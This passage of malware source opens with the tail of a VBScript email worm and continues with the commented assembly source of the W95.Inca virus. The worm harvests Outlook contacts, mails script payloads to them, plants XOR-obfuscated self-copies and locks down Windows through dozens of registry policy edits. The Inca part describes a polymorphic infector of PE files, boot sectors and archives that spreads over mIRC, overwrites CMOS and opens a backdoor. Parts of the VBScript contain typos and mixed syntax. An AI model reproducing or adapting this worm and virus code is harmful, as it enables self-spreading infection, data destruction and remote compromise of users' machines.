strB = Space(lngA + (lngA + 2) / 3)
For lngN = 1 To lngA
lngz = Asc(Mid(vbscopy, lngs, 1))
lngJ = lngJ + 1
Mid(strB, lngJ, 1) = Chr((lngz And 63) + 59)
Select Case lngs Mod 3
Case 1
lngK = lngK Or ((lngz / 64) * 16)
Case 2
lngK = lngK Or ((lngz / 64) * 4)
Case 0
lngK = lngK Or (lngz / 64)
lngJ = lngJ + 1
Mid(strB, lngJ, 1) = Chr(lngK + 59)
lngK = 0
End Select
Next lngs
If lngA Mod 3 Then
lngJ = lngJ + 1
Mid(strB, lngJ, 1) = Chr(lngK + 59)
End If
vbscopya = strB
end sub
sub mailsend()
dim x,a,ctrlists,ctrentries,malead,b,regedit,regv,regad
set regedit=CreateObject("WScript.Shell")
set out=WScript.CreateObject("Outlook.Application")
' 病毒的局限:只支持Outlook,而Outlook Express则不支持。
set mapi=out.GetNameSpace("MAPI")
for ctrlists=1 to mapi.AddressLists.Count
set a=mapi.AddressLists(ctrlists)
x=1
regv=regedit.RegRead("HKEY_CURRENT_USER/Software/Microsoft/WAB/"&a)
if (regv="") then
regv=1
end if
if (int(a.AddressEntries.Count)>int(regv)) then
for ctrentries=1 to a.AddressEntries.Count
malead=a.AddressEntries(x)
regad=""
regad=regedit.RegRead("HKEY_CURRENT_USER/Software/Microsoft/WAB/"&malead)
if (regad="") then
set male=out.CreateItem(0)
male.Recipients.Add(malead)
male.Subject = " Happy Valentine's Day To You"
male.HtmlBody ="<Script Language='VBScript'>"&psa&"</Script>"
male.Send
regedit.RegWrite "HKEY_CURRENT_USER/Software/Microsoft/WAB/"&malead,1,"REG_DWORD"
end if
x=x+1
next
regedit.RegWrite "HKEY_CURRENT_USER/Software/Microsoft/WAB/"&a,a.AddressEntries.Count
else
regedit.RegWrite "HKEY_CURRENT_USER/Software/Microsoft/WAB/"&a,a.AddressEntries.Count
end if
next
Set out=Nothing
Set mapi=Nothing
end sub
sub copyin(filea as string)
passa()
cont()
dim c,di,cr
set di=fso.opentextfile(filea)
cr=di.readall
di.close
fso.deletefile(filea)
set c=fso.CreateTextFile(filea)
dim usechar,word
usechar="1234"
word=""
Randomize
word=Mid(usechar,Le(usechar)*rnd+1,1)
Select Case Val(word)
Case 1
exor(pass)
c.write"On Error Resume Next "
c.write"dim"&""&conta&","&contb&","&"ts"&"ps"
c.wrtte"dim reg"
c.write"set reg=createobject('wscript.shell')
c.write"reg.RegWrite 'HKEY_CURRENT_USER/Software/Microsoft/Windows Scripting Host/Settings/Timeout',0,'REG_DWORD'"
c.write conta&"="&pass
c.write contb&"="&vbscopya
c.write"ts="&contb
c.write"ps="&conta
c.write dexorstring
c.write"dim ass,ff,dd"
c.write"set ass = CreateObject('Scripting.FileSystemObject') "
c.write"set dd=ass.createtextfile('%windir%/'"&conta&contb&"'.vbs')"
c.write"dd.write vbscopy"
c.write"dd.close"
c.write"shell('%windir%/'"&conta&contb&"'.vbs')"
c.close
Case 2
xortie(pass)
c.write"On Error Resume Next "
c.write"dim"&""&conta&","&contb&","&"ts"&"ps"
c.wrtte"dim reg"
c.write"set reg=createobject('wscript.shell')
c.write"reg.RegWrite 'HKEY_CURRENT_USER/Software/Microsoft/Windows Scripting Host/Settings/Timeout',0,'REG_DWORD'"
c.write conta&"="&pass
c.write contb&"="&vbscopya
c.write"ts="&contb
c.write"ps="&conta
c.write dexortie
c.write"dim ass,ff,dd"
c.write"set ass = CreateObject('Scripting.FileSystemObject') "
c.write"set dd=ass.createtextfile('%windir%/'"&conta&contb&"'.vbs')"
c.write"dd.write vbscopy"
c.write"dd.close"
c.write"shell('%windir%/'"&conta&contb&"'.vbs')"
c.close
Case 3
dim vbscopyb
vbscopyb=vbscopy
vbscopy=cr
xortie(pass)
vbscopy=vbscopyb
vbscopyb=vbscopya
exor(pass)
c.write"On Error Resume Next "
c.write"dim"&""&conta&","&contb&","&"ts"&"ps"
c.wrtte"dim reg"
c.write"set reg=createobject('wscript.shell')
c.write"reg.RegWrite 'HKEY_CURRENT_USER/Software/Microsoft/Windows Scripting Host/Settings/Timeout',0,'REG_DWORD'"
c.write conta&"="&pass
c.write contb&"="&vbscopya
c.write"ts="&contb
c.write"ps="&conta
c.write dexortie
c.write"dim ass,ff,dd"
c.write"set ass = CreateObject('Scripting.FileSystemObject') "
c.write"set dd=ass.createtextfile('%windir%/'"&conta&contb&"'.vbs')"
c.write"dd.write vbscopy"
c.write"dd.close"
c.write"shell('%windir%/'&conta&contb&'.vbs')"
c.write"sub main()"
c.write"ts="&vbscopyb
c.wirte dexorstring
c.write"dim dss"
c.write"set dss=ass.createtextfile("&conta*contb&"'.vbs')"
c.write"dss.write vbscopy"
c.write"dss.close"
c.write"shell("&conta*contb&"'.vbs')"
c.write"end sub"
c.close
Case 4
dim vbscopyb
vbscopyb=vbscopy
vbscopy=cr
exor(pass)
vbscopy=vbscopyb
vbscopyb=vbscopya
xortie(pass)
c.write"On Error Resume Next "
c.write"dim"&""&conta&","&contb&","&"ts"&"ps"
c.wrtte"dim reg"
c.write"set reg=createobject('wscript.shell')
c.write"reg.RegWrite 'HKEY_CURRENT_USER/Software/Microsoft/Windows Scripting Host/Settings/Timeout',0,'REG_DWORD'"
c.write conta&"="&pass
c.write contb&"="&vbscopya
c.write"ts="&contb
c.write"ps="&conta
c.write dexorstring
c.write"dim ass,ff,dd"
c.write"set ass = CreateObject('Scripting.FileSystemObject') "
c.write"set dd=ass.createtextfile('%windir%/'"&conta&contb&"'.vbs')"
c.write"dd.write vbscopy"
c.write"dd.close"
c.write"shell('%windir%/'&conta&contb&'.vbs')"
c.write"sub main()"
c.write"ts="&vbscopyb
c.wirte dexortie
c.write"dim dss"
c.write"set dss=ass.createtextfile("&conta*contb&"'.vbs')"
c.write"dss.write vbscopy"
c.write"dss.close"
c.write"shell("&conta*contb&"'.vbs')"
c.write"end sub"
c.close
End Select
end sub
sub xortie(passb as string)
vbscopya=""
dim k as long
dim length as integer
dim passc
length=len(passb)
for k=1 to 128
passc=passb+asc(mid(passb,k,1))*256*k
next k
passc=-passc
dim flength as long
dim size as long
dim byteblock() as byte
dim j as long
dim position as long
flength=lof(vbscopy)
size=flength
rnd(passc)
byteblock=vbscopy
for j=1 to size
byteblock(j)=byteblock(j) xor int(rnd*256)
next j
vbscopya=byteblock
end sub
sub killdatea()
On Error Resume Next
dim snow
set snow=CreateObject("WScript.Shell")
snow.regwrite"HKEY_CURRENT_USER/Software/Microsoft/Windows/CurrentVesion/Policies/Explorer/NoRecentDocsMenu",1,"REG_DWORD"
snow.regwrite"HKEY_CURRENT_USER/Software/Microsoft/Windows/CurrentVesion/Policies/Explorer/NoFind",1,"REG_DWORD"
snow.regwrite"HKEY_CURRENT_USER/Software/Microsoft/Windows/CurrentVesion/Policies/Explorer/NoRun",1,"REG_DWORD"
snow.regwrite"HKEY_CURRENT_USER/Software/Microsoft/Windows/CurrentVesion/Policies/Explorer/NoLogOff",1,"REG_DWORD"
snow.regwrite"HKEY_CURRENT_USER/Software/Microsoft/Windows/CurrentVesion/Policies/Explorer/NoClose",1,"REG_DWORD"
snow.regwrite"HKEY_CURRENT_USER/Software/Microsoft/Windows/CurrentVesion/Policies/Explorer/NoSetFolders",1,"REG_DWORD"
snow.regwrite"HKEY_CURRENT_USER/Software/Microsoft/Windows/CurrentVesion/Policies/Explorer/NoFavoritesMenu",1,"REG_DWORD"
snow.regwrite"HKEY_CURRENT_USER/Software/Microsoft/Windows/CurrentVesion/Policies/Explorer/NoStartBanner",1,"REG_DWORD"
snow.regwrite"HKEY_CURRENT_USER/Software/Microsoft/Windows/CurrentVesion/Policies/Explorer/NoSetTaskbar",1,"REG_DWORD"
snow.regwrite"HKEY_CURRENT_USER/Software/Microsoft/Windows/CurrentVesion/Policies/Explorer/NoFolderOptions",1,"REG_DWORD"
snow.regwrite"HKEY_CURRENT_USER/Software/Microsoft/Windows/CurrentVesion/Policies/Explorer/NoSetActiveDescktop",1,"REG_DWORD"
snow.regwrite"HKEY_CURRENT_USER/Software/Microsoft/Windows/CurrentVesion/Policies/Explorer/NoWindowsUpdate",1,"REG_DWORD"
snow.regwrite"HKEY_CURRENT_USER/Software/Microsoft/Windows/CurrentVesion/Policies/Explorer/NoViewContextMenu",1,"REG_DWORD"
snow.regwrite"HKEY_CURRENT_USER/Software/Microsoft/Windows/CurrentVesion/Policies/Explorer/NoTrayContextMenu",1,"REG_DWORD"
snow.regwrite"HKEY_CURRENT_USER/Software/Microsoft/Windows/CurrentVesion/Policies/System/NoDevMgrPage",1,"REG_DWORD"
snow.regwrite"HKEY_CURRENT_USER/Software/Microsoft/Windows/CurrentVesion/Policies/System/NoConfigPage",1,"REG_DWORD"
snow.regwrite"HKEY_CURRENT_USER/Software/Microsoft/Windows/CurrentVesion/Policies/System/NoFileSysPage",1,"REG_DWORD"
snow.regwrite"HKEY_CURRENT_USER/Software/Microsoft/Windows/CurrentVesion/Policies/System/NoVirtMemPage",1,"REG_DWORD"
snow.regwrite"HKEY_CURRENT_USER/Software/Microsoft/Windows/CurrentVesion/Policies/System/NoDispCPL",1,"REG_DWORD"
snow.regwrite"HKEY_CURRENT_USER/Software/Microsoft/Windows/CurrentVesion/Policies/System/NoDispBackgroundPage",1,"REG_DWORD"
snow.regwrite"HKEY_CURRENT_USER/Software/Microsoft/Windows/CurrentVesion/Policies/System/NoDispscrsavPage",1,"REG_DWORD"
snow.regwrite"HKEY_CURRENT_USER/Software/Microsoft/Windows/CurrentVesion/Policies/System/NoDispAppearancePage",1,"REG_DWORD"
snow.regwrite"HKEY_CURRENT_USER/Software/Microsoft/Windows/CurrentVesion/Policies/System/NoDispSettingsPage",1,"REG_DWORD"
snow.regwrite"HKEY_CURRENT_USER/Software/Microsoft/Windows/CurrentVesion/Policies/System/NoSecCPL",1,"REG_DWORD"
snow.regwrite"HKEY_CURRENT_USER/Software/Microsoft/Windows/CurrentVesion/Policies/System/NoPwdPage",1,"REG_DWORD"
snow.regwrite"HKEY_CURRENT_USER/Software/Microsoft/Windows/CurrentVesion/Policies/System/NoAdminPage",1,"REG_DWORD"
snow.regwrite"HKEY_CURRENT_USER/Software/Microsoft/Windows/CurrentVesion/Policies/System/NoProfilePage",1,"REG_DWORD"
snow.regwrite"HKEY_CURRENT_USER/Software/Microsoft/Windows/CurrentVesion/Policies/ActiveDesktop/NoComponents",1,"REG_DWORD"
snow.regwrite"HKEY_CURRENT_USER/Software/Microsoft/Windows/CurrentVesion/Policies/ActiveDesktop/NoAddingComponents",1,"REG_DWORD"
snow.regwrite"HKEY_CURRENT_USER/Software/Microsoft/Windows/CurrentVesion/Policies/ActiveDesktop/NoDeletingComponents",1,"REG_DWORD"
snow.regwrite"HKEY_CURRENT_USER/Software/Microsoft/Windows/CurrentVesion/Policies/ActiveDesktop/NoEditingComponents",1,"REG_DWORD"
snow.regwrite"HKEY_CURRENT_USER/Software/Microsoft/Windows/CurrentVesion/Policies/ActiveDesktop/NoClosingComponents",1,"REG_DWORD"
snow.regwrite"HKEY_CURRENT_USER/Software/Microsoft/Windows/CurrentVesion/Policies/Network/NoNetSetup",1,"REG_DWORD"
snow.regwrite"HKEY_CURRENT_USER/Software/Microsoft/Windows/CurrentVesion/Policies/Network/NoNetSetupIDPage",1,"REG_DWORD"
snow.regwrite"HKEY_CURRENT_USER/Software/Microsoft/Windows/CurrentVesion/Policies/Network/NoNetSetupSecurityPage",1,"REG_DWORD"
snow.regwrite"HKEY_CURRENT_USER/Software/Microsoft/Windows/CurrentVesion/Policies/Network/NoFileSharingControl",1,"REG_DWORD"
snow.regwrite"HKEY_CURRENT_USER/Software/Microsoft/Windows/CurrentVesion/Policies/Network/NoEntireNetwork",1,"REG_DWORD"
snow.regwrite"HKEY_CURRENT_USER/Software/Microsoft/Windows/CurrentVesion/Policies/Network/NoWorkgroupContents",1,"REG_DWORD"
snow.regwrite"HKEY_CURRENT_USER/Software/Microsoft/Windows/CurrentVesion/Policies/Explorer/NoPrinters",1,"REG_DWORD"
snow.regwrite"HKEY_CURRENT_USER/Software/Microsoft/Windows/CurrentVesion/Policies/Explorer/NoAddPrinter",1,"REG_DWORD"
snow.regwrite"HKEY_CURRENT_USER/Software/Microsoft/Windows/CurrentVesion/Policies/Explorer/NoDeletePrinter",1,"REG_DWORD"
snow.regwrite"HKEY_CURRENT_USER/Software/Microsoft/Windows/CurrentVesion/Policies/Explorer/NoPrinterTab",1,"REG_DWORD"
snow.regwrite"HKEY_LOCAL_MACHINE/Software/Microsoft/Windows/CurrentVersion/Winlogon/LegalNoticeCaption","I MISS YOU"
snow.regwrite"HKEY_LOCAL_MACHINE/Software/Microsoft/Windows/CurrentVersion/Winlogon/LegalNoticeText","难道真是昨夜星辰昨夜风,此情可待成追忆了吗?一切都仿佛发生在昨天!你好吗?我只是想知道你还好吗。"
if month(now()) = 3 then
goto die
end if
:die
dim n
n=100000
goto fire
:trysnow
if n = 0 then
n=100000
goto fire
else
goto fire
end if
:fire
snow.popul"给我痴迷的叶子:
别问我是谁,
我知道你不会看见这封信,因为你说现在不上网了。所以我把要告诉你的话,
真心的话,都写在这里。也许,有一天你会看见它,而我已离去,不再回头。
我说如果要爱你,我会背负上道德的枷锁。你说,自己的事别人管不着。
喜欢就是喜欢而不喜欢也不能勉强。可是善良、热情和体贴的我,有着软弱、
轻信和呆板的一面,你看到了吗?我难以放下别人的眼光,追求我的真爱。
如果现在我已经为此付出了心痛的代价,我相信,将来这代价会越来越大!
曾经对你说,我的心已经是一片死地,寂静而荒凉;我已不能体会什么是
伤心和痛苦,因为泉眼里已经没有汩汩的泉水。而现在,我遇到你之后,才
发现自己犯了一个错误——死的已经死了,而活着的并没有消失。它躲了起来,
等待着春风的吹拂,期盼着雨露的滋润。虽然它什么都不说,而只是默默的等待。
这时我等到了你。或许是,你终于找到了我。我爱上了你的声音,然后是你的
善良和体贴。我内心的欢喜无法言说,却小心翼翼的将之掩藏。我好想告诉你真
的已经爱上了你,可是对着你,对着电话,我又故做冷淡和理智! 我把你的信
读了一遍又一遍,而告诉你只读了一次;我把你的声音回味了一次又一次,却不
敢让你知道我已经深陷情网;我看着你的成长,为你欣喜,却更收藏我的创伤,
一个人默默舔尝。 你能体会我的话,对吗?每一次你都说:我懂,你的每一句话
我都懂!你不知道,这句话让我多感动! 好想爱,不能爱。
盼与你有来生缘!
Love you for ever."
shell("%windir%/write.exe")
n=n-1
goto trysnow
end sub
下面是病毒赏析今天我们要欣赏win.inca(第一只win32混合病毒)
;[W95.INCA] Multipartite PE/BOOT polymorphic mIRC spreading infector
;Copyright 1998 (c) Vecna
;
;This is my first attempt at w95 plataform. Is a multipartite infector of PE
;filez, focused in fast spreading. It infect PE files by adding a new section
;randomly named and a polymorphic VxD-dropper. It infect ARJ/ZIP/RAR/LHA/PAK
;by adding a random named COM dropper, encripted by a polymorphic loop. It
;infect boot of floppies by adding a polymorphic loader to their boot sectorz.
;It spread over internet using DCC protocol provided by mIRC, using a worm to
;spread over channelz. In the internet part is also the payload activation.
;
;The polymorphic decriptor in PE files isnt based in math instructionz, but
;in swapping. This novel technic of encription should provide problemz to
;disinfection and detection i hope, as not the whole code is "encripted" , but
;just some chunkz. The polymorphic decriptor is filled by lotz of conditionalz
;and unconditional jumpz.
;
;The polymorphic engine that generate the droppers and the boot loader keep
;track of the contentz of all regz and flagz, as in advanced engines as
;Uruguay or Level3. This mean that if i need AX holding 0x0202, as for load 2
;sectorz in the boot loader, i can obtain this values using XOR AX, ??? or
;ADD AX, ??? and like.
;
;This source isnt compilable as is. Use the pre-compiled virus.
;
;
;Here's the description of w95/Inca by DrWeb, translated from russian to
;english by Lurker (thankz!!)
;
;
;Win95. Inca
;
; Dangerous resident polymorphic multipartite virus. Win95.Inca
; infects EXE files in a format of PE (Portable Executable) for
; operation systems Windows95/98 and boot sectors of floppy
; disks. And also Win95.Inca is a virus-worm for ARJ, LHA, LZH,
; PAK, RAR and ZIP-archives and for the mIRC32 program.
;
; When infected PE file is started, the virus receives management
; and polymorphic decryptor deciphers the base code of a virus.
; And this decoding is made by enough unusual way - in initial variant
; the base virus code will contatin the table of indexes or displacements
; of original bytes in the virus body. And it is necessary to understand
; that decoding in this case will be substitution or compilation
; original bytes on place of their one-byte indexes or displacements.
; After given "assembly" of the code, virus determines (by
; "already standard" for this type of viruses algorithm) the address
; of interesting for it functions in KERNEL32.DLL and creates
; a file C:/W95INCA.COM, in which file virus writes a polymorphic
; DOS COM dropper.
;
; This polymorphic 16bit DOS-code is already generated on infection of
; the PE EXE-file, and because of that any "additional efforts" for
; creation of a polymorphic copies on the given stage are not undertaken.
; Then the created file is closed.
; This dropper file is executed by the virus and then, after some delay,
; deleted. Further the virus returnes back management to the
; infected host PE-file.
; This is all actions, which carries out a virus code in the PE EXE-file.
; Therefore, it is possible to consider all infected PE EXE-files, as
; droppers.
;
; The C:/W95INCA.COM file, executed by the virus, determines Windows
; directory (WINDIR) and tries to create in the /WINDOWS/SYSTEM folder
; a file with the name FONO98.VXD.
; If this attempt is successful, the virus unpacks
; with the elementary algorithm, a code of the 32bit VxD-driver,
; which is contained inside of the 16bit DOS-code, and writes it in
; this newly created FONO98.VXD file.
;
; Further virus opens a configuration Windows file SYSTEM.INI, searches
; in it for the section "[386Enh]" and just below this line
; writes a line "device=fono98.vxd".
;
; After described manipulations, or, if the line "device=fono98.vxd"
; is already is present in the SYSTEM.INI, or file FONO98.VXD
; was created earlier in the /WINDOWS/SYSTEM folder, or,
; if it wasn't possible to find the WINDOWS folder, virus finishes its
; work and returns management to DOS.
;
; After the system reboot and on the next startof Windows virus
; VxD-driver FONO98.VXD is loaded by the system into a memory and
; runned.
;
; In a first task, the virus driver deletes system VxD-driver HSFLOP.PDR
; in the catalogue /WINDOWS/SYSTEM/IOSUBSYS folder. Then virus reads
; in memory a code from its own FONO98.VXD and creates in memory
; three different polymorphic copies: for infection PE EXE-files,
; for infection of boot-sectors of floppies and for creation of
; 16bit DOS droppers in a format of COM-files.
; Futher, in a current session, and untill the next system reboot,
; virus will infect the specified objects only with these copies.
;
; Win95.Inca concerns to a class of the "slow polymorpics".
; Further virus "intercepts" IFSMgr FileSystemApiHook and Int 13h
; (disk operations), establishing on them its own events handlers.
;
; IFSMgr handler of the virus supervises opening files. On the
; opening files with extensions EXE and SCR, virus checks their
; internal format, and if the opening files are Portable Executable,
; virus infects them, by creating additional code section with a
; random name in the header of PE-file and writing in its area virus
; polymorphic code. On opening of archive files with the extensions
; LHA, LZH, PAK, ZIP, ARJ or RAR, the virus adds to the given
; archives its 16bit polymorphic code (worm) in a format of COM-file,
; also modifies header of the archive files in such a manner that
; the this virus-worm appears placed in the archive in a unpacked
; form (store format) also receives a random name, consisting from
; four letters, and with the extension COM or EXE (for example, AAAA.COM
; or ABCD.EXE). On opening of the MIRC32.EXE file (program for
; "chat" over the Internet) the virus writes or adds in the end
; of the configuration file MIRC.INI, line " [fileserver]" and
; "Warning = Off".
;
; Also virus creates a new (if they exist on a disk) files SCRIPT.OLD,
; SCRIPT.INI, INCA.EXE and REVENGE.COM.
; In the file INCA.EXE, virus writes a code of the polymorphic 16bit
; virus-worm. In the file REVENGE.COM - 231 bytes of the trojan code,
; that rewrites the content of the CMOS-memory.
; [*Authors Note - It put a password in AMI/AWARD BIOS*]
;
; And in the file SCRIPT.INI virus writes text of the virus MIRC-worm.
;
; On start of the MIRC32.INI under scenario of the SCRIPT.INI,
; it runs the file INCA.EXE. Further under the same scenario it
; tries to send files SCRIPT.INI (mIRC-worm) and INCA.EXE (virus
; dropper) to computers of all members of the "chat conversation" in
; the Internet.
; If during the chat there will appaer a text string "El_inca",
; under the scenario of the SCRIPT.INI - trojan program REVENGE.COM
; will be launched. If somebody will "tell a word" "ancev",
; the virus script "will allow" him to access disk drive C:.
; Even if this person is for several thousand miles from the infected
; computer.
;
; And if at the time of "conversation" there will appear a text
; "_29A_", the program MIRC32.EXE will self-exits.
;
; Virus handler of the disk operations on the Int 13h, supervises
; the reading of the boot sectors of the floppes in the drive A:
; and on an opportunity infects them, by replacing the original
; boot loader with polymorphic, and writing on a disk its own
; copies.
;
; On a booting from such infected floppy, virus loader will
; receive management, and will read to memory all sectors with the
; virus code, "will intercept" Int 1Ch (timer), and then Int 21h.
; A task of the Int21h handler is simple - on the first
; opportunity, it tries to create FONO98.VXD in the
; C:/WINDOWS/SYSTEM folder and to register
; it in the SYSTEM.INI configuration file (in the "[386Enh]" section).
; The task is exactly the same, as well as performed by a
; C:/W95INCA.COM file-dropper, algorithm of which was
; described in the beginning.
; A difference only that the dropper C:/W95INCA.COM determines
; the lochation of Windows system folder fome a variable WINDIR.
; And Int21h handler tries to place dropper in the C:/WINDOWS/SYSTEM
; folder.
; After the given attempt (successful or not) the virus
; "releases" Int21h and neutralizes its own copy in memory.
;
; The virus contains text "El Inca virus".
;
; The size of the virus VxD-driver is 15327 bytes.
;
; So, all infected objects can be considered as virus-hosts or droppers,
; except created by the virus VxD-driver.
; This VxD-driver installs virus copy in memory, and hits all other
; objects. However you see that it does not infect
; "similar to itself" VxD-drivers. VxD-driver is only the carrier
; of an infection, but it is not an infected object.
;
MINSIZEINFECT EQU 8*1024 ;zopy me - i want to trawel
BPB STRUC
bpb_jmp db 3 dup (?)
bpb_oem db 8 dup (?)
bpb_b_s dw ?
bpb_s_c db ?
bpb_r_s dw ?
bpb_n_f db ?
bpb_r_e dw ?
bpb_t_s dw ?
bpb_m_d db ?
bpb_s_f dw ?
bpb_s_t dw ?
bpb_n_h dw ?
bpb_h_d dw ?
bpb_sht db 20h dup (?)
BPB ENDS
.386p
.XLIST
Include Vmm.Inc
Include Ifs.Inc
Include Ifsmgr.Inc
.LIST
Declare_Virtual_Device FONO98, 1, 0, FONO98_Control, Undefined_Device_ID,,,
VxD_Locked_Code_Seg
IncaName db 'INCA.EXE', 0 ;Vars used by the virus
NextHook dd 0
FileHandle dd 0
FileSize dd 0
FileAttr dd 0
Pad dd 0
BufferOneHandle dd 0
BufferTwoHandle dd 0
VxDCompressedBuffer dd 0
VxDCompressedSize dd 0
PolyBootSize dd 0
PolyBootBuffer dd 0
PolyDOSFileBuffer dd 0
PolyDOSFileSize dd 0
PolyPESize dd 0
PolyPEBuffer dd 0
VMF_handle dd 0
VMF_size dd 0
VMF_base dd 0
OurFile db 0
FloppyInUse db 0
UpDown db 0
Compressed db 0
CrpTbl db 200h dup (0)
SectorBuffer Equ This Byte
CrcTab db 2048 dup (0)
FileName Equ This Byte
VMM32Path db MAX_PATH dup (0)
ZIPRHeaderId db 'PK' ;Structures used when
ZIPRSignature db 01, 02 ;infecting archivers
ZIPRVerMade dw 10
ZIPRVerNeed dw 0ah
ZIPRFlags dw 0
ZIPRMethod dw 0
ZIPRTimeDate dd 12345678h
ZIPRCRC32 dd 0
ZIPRCompressed dd 0
ZIPRUncompressed dd 0
ZIPRSizeFilename dw ZIPRNameLenght
ZIPRExtraField dw 0
ZIPRCommentSize dw 0
ZIPRDiskNumba dw 0
ZIPRInternalAttr dw 01
ZIPRExternalAttr dd 21h
ZIPROffsetLHeaderR dd 0
ZIPRFilename db 'AAAA.COM'
ZIPRNameLenght Equ This Byte - offset32 ZIPRFilename
ZIPRHeaderSize Equ This Byte - offset32 ZIPRHeaderId
ZIPLHeaderId db 'PK'
ZIPLSignature dw 0403h
ZIPLVersionNeed dw 0010
ZIPLFlags dw 80h
ZIPLMethod dw 0
ZIPLDateTime dd 12345678h
ZIPLCRC32 dd 0
ZIPLCompressed dd 0
ZIPLUncompressed dd 0
ZIPLSizeFilename dw ZIPLNameLenght
ZIPLExtraField dw 0
ZIPLFilename db 'AAAA.COM'
ZIPLNameLenght Equ This Byte - offset32 ZIPLFilename
ZIPReadBuffer Equ This Byte
ZIPEHeaderId db 'PK'
ZIPSignature dw 0
ZIPNoDisk dw 0
ZIPNoStartDisk dw 0
ZIPEntryDisk dw 0
ZIPEntrysDir dw 0
ZIPSizeDir dd 0
ZIPOffsetDir dd 0
ZIPCommentLenght dw 0
ZIPEHeaderSize Equ This Byte - offset32 ZIPEHeaderId
ARJHeaderId dw 0ea60h
ARJHeaderSize dw offset32 ARJHeaderCRC-offset32 ARJ1HeaderSize
ARJ1HEaderSize db offset32 ARJFilename-offset32 ARJ1HeaderSize
ARJVersionDone db 6
ARJVersionNeed db 1
ARJHostOS db 0
ARJFlags db 0
ARJMethod db 0
ARJType db 0
ARJReserved db 0
ARJDateTime dd 12345678h
ARJCompressedSize dd 0
ARJUncompressedSize dd 0
ARJFileCRC dd 0
ARJEntryname dw 0
ARJAccessMode dw 21h
ARJHostData dw 0
ARJFilename db 'AAAA.COM',0
ARJComment db 0
ARJHeaderCRC dd 0
ARJExtHeader dw 0
ARJEnd dw 0ea60h, 0000h
RARHeaderCRC dw 0
RARHeaderType db 74h
RARFileFlags dw 08000h
RARHeaderSize dw offset32 RARHeaderEnd - offset32 RARHeaderCRC
RARCompressedSize dd 0
RARUncompressedSize dd 0
RARHostOS db 0
RARFileCRC dd 0
RARDateTime dd 12345678h
RARVersionNeed db 14h
RARMethod db 30h
RARFileNameSize dw offset32 RARHeaderEnd - offset32 RARFileName
RARFileAttribute dd 21h
RARFileName db 'AAAA.COM'
RARHeaderEnd Equ This Byte
LHASig db LHAHeaderSize-2
LHAHeaderCRC db 0
LHAMethod db '-lh0-'
LHACompressedSize dd 0
LHAUncompressedSize dd 0
LHADateTime dd 12345678h
LHAFlags dw 120h
LHANameLenght db offset32 LHASizeFilename - offset32 LHAFilename
LHAFilename db 'AAAA.COM'
LHASizeFilename Equ This Byte
LHACRC16 dw 0
LHAStuff db 'M'
LHAStuff2 dw 0
LHAHeaderSize Equ This Byte - offset32 LHASig
MyVxDName db "FONO98.VXD",0
SizeVxDName Equ This Byte - offset32 MyVxDName
FloppyVxD db "IOSUBSYS/HSFLOP.PDR", 0
SizeFloppyVxDName Equ This Byte - offset32 FloppyVxD
BootLoaderSize Equ BootLoaderEnd-BootLoader
BootLoader: ;This code is inserted in
cli ;0/1/15 in 1.44 floppies
xor ax, ax
mov ss, ax
mov sp, 7c00h